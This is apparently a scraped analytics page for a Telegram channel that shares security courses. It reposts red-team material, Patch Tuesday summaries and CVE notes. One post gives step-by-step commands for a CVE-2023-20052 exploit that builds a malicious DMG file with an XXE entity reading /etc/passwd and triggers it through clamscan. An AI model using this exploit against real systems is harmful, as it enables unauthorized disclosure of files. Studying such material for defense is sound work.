Available now! Telegram Research 2025 β the year's key insights 
All Security Engineering Courses
Open in Telegram
This channel is being updated often with older than 2020 courses, ebooks, videos, code, etc. to be used responsibly by everyone in CyberSecurity in an ethical manner. Lots of content is being downloaded from other channels or forwarded here. Bookmark me!
Show moreπ Analytical overview of Telegram channel All Security Engineering Courses
Channel All Security Engineering Courses (@allsecurityengineeringcourses) in the English language segment is an active participant. Currently, the community unites 18 795 subscribers, ranking 7 162 in the Technologies & Applications category and 35 950 in the Russia region.
π Audience metrics and dynamics
Since its creation on Π½Π΅Π²ΡΠ΄ΠΎΠΌΠΎ, the project has demonstrated rapid growth, gathering an audience of 18 795 subscribers.
According to the latest data from 15 June, 2026, the channel demonstrates stable activity. Although there has been a change in the number of participants by 133 over the last 30 days and by 4 over the last 24 hours, overall reach remains high.
- Verification status: Not verified
- Engagement rate (ER): The average audience engagement rate is 10.04%. Within the first 24 hours after publication, content typically collects 3.00% reactions from the total number of subscribers.
- Post reach: On average, each post receives 1 887 views. Within the first day, a publication typically gains 563 views.
- Reactions and interaction: The audience actively supports content: the average number of reactions per post is 3.
- Thematic interests: Content is focused on key topics such as git, strace, github, linux, docker.
π Description and content policy
The author describes the resource as a platform for expressing subjective opinions:
βThis channel is being updated often with older than 2020 courses, ebooks, videos, code, etc. to be used responsibly by everyone in CyberSecurity in an ethical manner. Lots of content is being downloaded from other channels or forwarded here. Bookmar...β
Thanks to the high frequency of updates (latest data received on 16 June, 2026), the channel maintains relevance and a high level of publication reach. Analytics show that the audience actively interacts with content, making it an important point of influence in the Technologies & Applications category.
18 795
Subscribers
+424 hours
+357 days
+13330 days
Posts Archive
Transfer files easily between a Kali Linux and Windows system by running an SMB service on Kali and accessing it from the Windows system.
Run this on Kali:
Impacket-smbserver -smb2support -username vonnie -password 'Password-123!' foo .
Access from the Windows side (by IP):
\\192.168.1.158\foo\
Repost from Red Team Alerts
Transferring files from windows to kali using Impacket smbserver.py doesn't work?
Transferring files from kali to windows is easy with something like python http.server. What about transferring files from windows to kali? I found very useful blog post here and attempted to do similar thing with Impacket smbserver.pyhttps://blog.ropnop.com/transferring-files-from-kali-to-windows/#smbSetup
Kali: 172.16.1.10 Windows: 172.16.1.50Run smbserver on Kali with Impacket smbserver.py
ββ$ /usr/share/doc/python3-impacket/examples/smbserver.py share /tmp Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation [*] Config file parsedHowever, whenever I try on Windows, I'm getting "System error 53 has occurred, The network path was not found" as follows:
C:\>net view \\172.16.1.10\ System error 53 has occurred. The network path was not found.Here is the message on Impacket smbserver.py
[*] Incoming connection (172.16.1.50,56201) [*] Closing down connection (172.16.1.50,56201) [*] Remaining connections []Then, I tried again with \share, but still getting the same error
C:\>net view \\172.16.1.10\share System error 53 has occurred. The network path was not found.What's wrong and what should I do to make this right? Discuss on Reddit: https://ift.tt/xlSZ4m2 @redteamalerts
Webinar Assessing the Security of Your Active Directory Privileged Account Risks and Controls
π₯Red Team and Adversary Simulation with BruteRatel C4 π₯
π₯Add this to your personal collection to view offline!π₯
π₯ Red Team and Adversary Simulation with BruteRatel C4 π₯
My big THANK YOU to all following my Telegram channel!
Also here: https://www.youtube.com/playlist?list=PLl7h-59muprN-LS_WRKq1ldsknCDJm25O
UPCOMING UPLOAD...
Repost from RT x TEAM </>
@nyxgeek
I think most pentesters have used the classic OWA time-based user enum at some point. Or time-based enum in Lync.
What if I told you that time-based user enum lives on in Azure? And it's tied to Basic Auth.
Basic Auth is dead. Long live Basic Auth!
https://trustedsec.com/blog/kicking-it-old-school-with-time-based-enumeration-in-azure
CVE-2023-20052 exploit
(https://github.com/nokn0wthing/CVE-2023-25002)To create malicious DMG file:
$ git clone https://github.com/nokn0wthing/CVE-2023-20052.git
$ cd CVE-2023-20052
$ sudo docker build -t cve-2023-20052 .
$ sudo docker run -v $(pwd):/exploit -it cve-2023-20052 bash
$ genisoimage -D -V "exploit" -no-pad -r -apple -file-mode 0777 -o test.img . && dmg dmg test.img test.dmg
$ bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>|' -e 's/blkx/&xxe\;/' test.dmg -o exploit.dmg
To trigger exploit:
$ clamscan --debug exploit.dmg
Hello everyone! This episode will be about Microsoft Patch Tuesday for July 2023, including vulnerabilities that were added between June and July Patch Tuesdays.
Vulristics improvements
00:11 Works faster
01:31 Microsoft ADVs
02:45 Comments Table
TOP
04:09 Remote Code Execution β Microsoft Office (CVE-2023-36884)
05:06 Security Feature Bypass β Windows SmartScreen (CVE-2023-32049)
05:48 Security Feature Bypass β Microsoft Outlook (CVE-2023-35311)
06:37 Elevation of Privilege β Windows Error Reporting Service (CVE-2023-36874)
07:16 Elevation of Privilege β Windows MSHTML Platform (CVE-2023-32046)
Other RCEs
08:10 Remote Code Execution β Windows Active Directory Certificate Services (AD CS) (CVE-2023-35350)
09:01 Remote Code Execution β Microsoft Message Queuing (CVE-2023-32057, CVE-2023-35309)
09:44 Remote Code Execution β Windows Routing and Remote Access Service (RRAS) (CVE-2023-35365, CVE-2023-35366, CVE-2023-35367)
10:24 Remote Code Execution β Windows Layer-2 Bridge Network Driver (CVE-2023-35315)
10:57 Remote Code Execution β Microsoft SharePoint (CVE-2023-33134, CVE-2023-33157, CVE-2023-33159, CVE-2023-33160)
11:42 Remote Code Execution β Windows Pragmatic General Multicast (PGM) (CVE-2023-35297)
π Video
(https://youtu.be/vvQFMHt64X4)π Video2 (for Russia)
(https://vk.com/video-149273431_456239131)π (https://avleonov.com/vulristics_reports/ms_patch_tuesday_june2023_report_with_comments_ext_img.html)Blogpost
(https://avleonov.com/2023/07/28/microsoft-patch-tuesday-july-2023-vulristics-improvements-office-rce-sfb-smartscreen-and-outlook-eop-mshtml-and-ers-other-rces/)π Vulristics report
(https://avleonov.com/vulristics_reports/ms_patch_tuesday_july2023_report_with_comments_ext_img.html)ΠΠ° ΡΡΡΡΠΊΠΎΠΌ
(https://t.me/avleonovrus/722)@avleonovcom #AD #ADV #DarkReading #EoP #ERS #Kaspersky #KrebsOnSecurity #Layer2Bridge #Microsoft #MicrosoftOffice #MSHTML #MSMQ #Outlook #PGM #Qualys #Rapid7 #RCE #RRAS #SFB #SharePoint #SmartScreen #SophosNakedSecurity #Tenable #TheHackerNews #Vulristics #ZDI
YouTube (https://youtu.be/vvQFMHt64X4)
Microsoft Patch Tuesday July 2023: Vulristics improvements, Office RCE, SFB SmartScreen and Outlook
Hello everyone! This episode will be about Microsoft Patch Tuesday for July 2023, including vulnerabilities that were added between
Linux Bluetooth: Unauthorized management command execution (https://github.com/lrh2000/CVE-2023-2002) (CVE-2023-2002, PoC exploit (https://github.com/lrh2000/CVE-2023-2002/blob/master/exp/bt_power.c) included)
An insufficient permission check has been found in the Bluetooth subsystem of the Linux kernel when handling ioctl system calls of HCI sockets. This causes tasks without the proper CAP_NET_ADMIN capability can easily mark HCI sockets as trusted. Trusted sockets are intended to enable the sending and receiving of management commands and events, such as pairing or connecting with a new device. As a result, unprivileged users can acquire a trusted socket, leading to unauthorized execution of management commands. The exploit requires only the presence of a set of commonly used setuid programs.
If successfully exploited, the identified vulnerability has the potential to compromise the confidentiality, integrity, and availability of Bluetooth communication. Attackers can exploit this vulnerability to pair the controller with malicious devices, even if the Bluetooth service is disabled or not installed.
